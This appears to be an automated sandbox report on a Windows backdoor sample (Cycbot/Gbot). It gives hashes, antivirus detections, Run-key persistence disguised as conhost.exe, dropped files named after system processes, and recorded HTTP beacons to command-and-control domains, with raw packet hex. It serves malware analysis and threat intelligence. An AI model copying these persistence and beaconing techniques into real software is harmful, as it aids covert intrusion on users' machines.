Analysis Date: 2014-06-05 23:42:41
MD5: b76ba3ce82337e9ad69264a342da13dd
SHA1: 7e1a65476cc4a54c85bfbbead84bf14e548d1f74

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 825920f710ff16d870b181bd99a5e418 sha1: 6026320929d976343765648aecde11b378fb9b30 size: 111104
Section .rdata: md5: 2d61be64a53cf5503a97ebf7243558c8 sha1: 8ba07d8a6f03b5aa1a0e5c83ac80f182feab2b2b size: 1024
Section .data: md5: b8185363827062fc6c37922c312de4d2 sha1: 153fa1b673d25ca8c5fcf15e53a082886c43fa9d size: 67584
Section .reloc: md5: 4ef2908b2174fa9ed2e5f8530f8e2c83 sha1: dabf91825a2e210cb63988904e3e240aeca0a3d0 size: 1024
Timestamp: 2005-09-12 21:03:24
PEhash: 627a6427558dcd63bfade9db2f2a10b79e5851b1
IMPhash: d3465b47616aa9a80df61c122c2f356f
AV 360 Safe: Gen:Heur.Conjar.5
AV Ad-Aware: Gen:Heur.Conjar.5
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV CA (E-Trust Ino): Win32/Cycbot.G!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-449
AV Dr. Web: BackDoor.Gbot.73
AV Emsisoft: Gen:Heur.Conjar.5
AV Eset (nod32): Win32/Cycbot.AD
AV Fortinet: W32/Kryptik.SMY!tr.bdr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Rogue:W32/OpenCloud.A
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cycbot
AV Kaspersky: Backdoor.Win32.Gbot.ogk
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.n
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.5
AV Norman: winpe/Cycbot.EC
AV Rising: Backdoor.Win32.Cycbot.a
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Trojan
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): Trojan.FakeAV.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: 127.0.0.1
Winsock DNS: yourblogresources.com
Winsock DNS: coolmediastore.com
Winsock DNS: onlineinstitute.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: onlineinstitute.com (Type: A) ➝ 67.227.195.200
DNS: zonedg.com (Type: A) ➝ 208.73.211.199
DNS: zonedg.com (Type: A) ➝ 208.73.211.196
DNS: zonedg.com (Type: A) ➝ 208.73.211.172
DNS: zonedg.com (Type: A) ➝ 208.73.211.152
DNS: zonedg.com (Type: A) ➝ 208.73.211.235
DNS: coolmediastore.com (Type: A)
DNS: yourblogresources.com (Type: A)
HTTP GET: http://onlineinstitute.com/g7/images/logo.jpg?v83=87&tq=gHZutDyMv5rJejfia9nrmsl6giWz%2BJZbVyA%3D
    User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
    User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqxSr%2Fe%2BV5ZuRg%3D%3D
    User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 67.227.195.200:80
Flows TCP: 192.168.1.1:1032 ➝ 208.73.211.199:80
Flows TCP: 192.168.1.1:1033 ➝ 208.73.211.199:80

Raw Pcap
0x00000000 (00000)   47455420 2f67372f 696d6167 65732f6c   GET /g7/images/l
0x00000010 (00016)   6f676f2e 6a70673f 7638333d 38372674   ogo.jpg?v83=87&t
0x00000020 (00032)   713d6748 5a757444 794d7635 724a656a   q=gHZutDyMv5rJej
0x00000030 (00048)   66696139 6e726d73 6c366769 577a2532   fia9nrmsl6giWz%2
0x00000040 (00064)   424a5a62 56794125 33442048 5454502f   BJZbVyA%3D HTTP/
0x00000050 (00080)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206f6e    close..Host: on
0x00000070 (00112)   6c696e65 696e7374 69747574 652e636f   lineinstitute.co
0x00000080 (00128)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 6d6f7a69   User-Agent: mozi
0x000000a0 (00160)   6c6c612f 322e300d 0a0d0a              lla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42387976 55712532 4633766c   ij%2B8yvUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6564672e   1..Host: zonedg.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   206d6f7a 696c6c61 2f322e30 0d0a436f    mozilla/2.0..Co
0x00000100 (00256)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000110 (00272)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000120 (00288)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42383275 59764561 53253246   ij%2B82uYvEaS%2F
0x000000c0 (00192)   54253242 73717853 72253246 65253242   T%2BsqxSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7563 68206669    close....uch fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
..
IWW
9`
.
1#
35b
.J.

080904b0
1.0.0.1
1509
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
``````
``<[,`
^^^^^^^
^^^^^^^^^^^^^
~~~~~~~~~~~~
~~~~~~~~~~~~~
<<<<<<
<<<<<<<
<<<<<<<<<<<<<<<<
<<<<<<<<<<-
>>>>>>>>>>
|||||||||||
|||||||||||||||
  ,  ,` 
,,,,,,
,,,,,,,
;;;;;;
:||**********
::::::::::
!!!!!!!!
!!!!!!!!!!!
!!!!!!******
///////
. `,  
.........
''''''''
""""""
"@@* `$
(((((((((((((
((				
)))))))))
]]]~~~~/
{{{{{{{{{{
****"""""
******
\\\\\\\\
&&&&&&&&&
+++++++
<0>FxG
111111111
*****1111nn
1{"@ h
;;;;;;222222
222222222
;26B"	i
2GpcK	
]	2o_R
:2w?"J
333333aa
3a?8EJ
`3Bb<.
@`~3By
3DcKNH
3NZE3S[
3+^OhL
3x5'oXg
<|3Zlk|
`4-}0dk
444###############///////
44444444444444444444
  47v4
%4?M8R
>4RV9j
4s\gKb
-4W"  
]5"  ]
>>55555
555555555555555
5555555FFF
5h:XGZ
\5YOmz
65&``8
666666|||||||||||||||||||||||
66666666
67-a02
6"l#hE
6R7%#,AM
6uLi,6
6`X1Y?
.[6^yY9\|-
777777777
/?7b':
;7nodf
{7S4lHR
7uI=pug
])7Z}<#
85wU@>
;;;;;;;;;;;88
88888888
8FAgSi
.``8k<
8,@ 's
8UEI]k
~8/zrVy
9@2v&@
^^^9999999??***
!;99(q
9!/~C%
9{DB\9
9QG~{^
@9yt;IV
`A9-EW
A!9M4_
]]]]]]aaa
$$$$AAA
AAA333A
AAAAAA
A$BE23
ahJ+i-T
AnH03g
Atntz\
b]09Qz
B=6mN<
bbbbb{
BBBBBB
BBBBBBBBBBrrr[
BBBBBB..cc>>>>xx
<=?B#h
bvsEQI<
 `BW2y
,,,,,,,,,,C
ccccccccccccccc
CCCCCCCCCCCCCCCC
ccccccccccccccccc
CCNNNeeee
cHoR7#
cwt{T%X
d}2BEP
@.data
?--dB/O
	|`Dd5
|||dddd
dddddd
DDDDDDDDDDD
`DDDttttt
d|IP	H>
~D. @O
Dou!Co
dpi"S#
`dqnF$
dQ-ww@
DuplicateHandle
D%Y0s>
  @E}7]
e7cG$@
-eC|,>d
}ed$Ch
-EEE________
EEEEEE
eeeeeeeee
EEEEEEEEEEEEEE
Ehph)Y
EnumResourceNamesW
Eo>=1)K
>Eoe'_
EY]AOB
f*  <%)
FD	Hb>A
FFFFFF----
fffffffffffff
ffffffffffffffff
ffs^vr
FindClose
FindFirstFileA
FindResourceExA
Fjjjjjjjj
FlushInstructionCache
( @Fo;
fP@	Rh
|F!qTuH-|)
F(rF9v
 :FTc>
g. @. 
"``G:;
\G5R't
gd91Og
`G-_dy
GE#GwW
GetModuleFileNameW
GfJ^Uj
GGGGGGGGGA
gggggggggggggggggg
}G*@@Zs`*
gzx2?R
h[0rwM
'H)2):Q
	h4}v^L
ha)gC-
hQ@'_[
;HQWA2
hRR{(@@u
hT3prp
/h,`V1K
i{1=2( @y
)ihd>Y@{0
I:=i: e
iiggggg
iiiiii
IIIIII
IIIjjjjjjjjx
****iiiPP
iLnmLX
it26gr
Itg/t<
iTk6A]<
^/i|wZ
I%zx<Cx
jBco;E
jjjjjj
jjjjjjj
jjjjjjjj
JJJJJJJJ
j;;TsI
jUAl*%
Jy^_T]
JZ4vqOs
K&@ 2^
@ @`\K4w
k555555555
-`KCuP
KERNEL32.dll
Kga=	s_
  KKKKK
kkkkkkkEEEEEEEEEEEEElll
<-K:oaB
 kOYQ|
`'|kQ2
k'tX&5zB
K.@`V	
k+<vSN
k***VV
l3+<clV
l9NG>0UxB
!l#hx\yQ
lllFFFFFF
LLLLLLffffffffBBBBBBBB
LLLLLLLL!
LMtd;Un
lNfef\
"Lrz3z8
MapViewOfFile
 `Mci~
m~kBz1
(ML4u(J
MMMMMMMM
mmmmmmmmm
mmmmmmmmmmmmmmvvv
mmm&QQ
mtT$#c
m'v/#la
N0CP/~8
-ncd=0'
NdrComplexArrayFree
	(@`=nF*
NN55555555555
NNDDDDD{{
NnGvVQ
NNNNNN
NNNNNNN
nnnnnnnnn
NPkv+]W
Nsy:ar
@(@@Nt
"#n:T0
``& @o
O1,`@Hj%[uu
oBOQd(
oIjDgIg
Oo2	jOQ$
oooooo......
oooooooooooo
&oq%fR
@`Ot{a
owu9{v
ox>iWX?
`{P$@ 
,p	4+S
P4yMz5
@p:6]x!h
PathAppendW
PathCombineW
PathFileExistsW
PathRemoveFileSpecW
p"@`c:6
P?k5,/
PkRh*'
ppppp111
pppppppp
\^P`^R
;;;;;;;;;;Q$
q7(@@B
qGKpPveL
ql;n"x
$^ qo*
>}q)Q{
QQQQQQ
QQQQQQQ
qqqqqqqqqq1111
q/r{#)7
qThhiv
?QublS
.q'&vkd;0c
\q,z(i
~R7?;9
R)cm5X
`.rdata
r\)Dur
.reloc
renAp&
RPCRT4.dll
RRR/++++
rrrrrrRR
,}~S},
s0n;}L
s3p:'TDyb
SetLocaleInfoW
s{f@-B
sGXX)&@
SHELL32.dll
Shell_NotifyIconA
SHGetValueW
SHLWAPI.dll
Sj.8^9
S*  Jo
@SO5FJ
]SQ=bL
sssssss
s[W4y!E
s#{{y(@
szZF].
T7777777777yyyyyyy0AAAA||VVVVVVV
@`TfFSs
)'$T)g129
!This program cannot be run in DOS mode.
timeEndPeriod
ttttt..
TTTTTT
tttttttt       
TTTTTTTTTLL
tttttttttt
**tttttttttttttt
Tu}Y/1
^]t>yP
u!!!!!
U\6m}j
:U^|8g
u9A\{8
:U*e;h
u)?]id
UixGk0
=?-UKy5i
_>uNf1
UnmapViewOfFile
 >U`O 
####UU
UuidCreate
UURRRRRRR@@@@@@@@@@
uuuuuu
UUUUUUlllll
uuuuuuuuuuuuuuu
u>vJc]
U,  W2r
`"uyX`
,:vA^W
VF1N[%
vF* @gT
"@`VqL
VsH!vPI
VT<\K/it
vvvvvvvvvvvv
/w&%&|
`W3n6g9
w"` 42
W9YH3l
?wB,v])Y
?*` Wc
Wggggggg
wgSSc|
WJj>g1Kx|
wj/rZ|
Wmy{Yy
wRv'"U
www;;;;NNNNNNN
WWWWWWWWWWWWWFFFFFF
wXg:}T
Wz}JD>
x5uy4ql
X*,,66666666666
^Xd[M `
@.@`XMZB
XR2	jD
)xrV~5
x'RWp91
@ XSK1>\j
'Xv9(@
x(`@wdBA
`````xxxx
yA1He	yK
YCs]x}}
YD0G{u
yG~)e#
Y@]jK.` 
yq+1i4
YW|46p6
YWMt6]n
yyyttttt
yyyyyyyyyy
yyyyyyyyyyyyyyy%%%%%%%%%%%%%%%%%
|)z) ;
++++++++++++Z
Z_/2.I
z_)66Ky
 @`za$
{ZeBig
-+zGoH
zH.p)cO
z/ip\j
 &Zn<1k
-zpY<{
`zv:Mr
ZX5VlY5I
z_Z>{C
ZzH7k#
zzI00000000
ZZZZZZZZ
ZZZZZZZZZ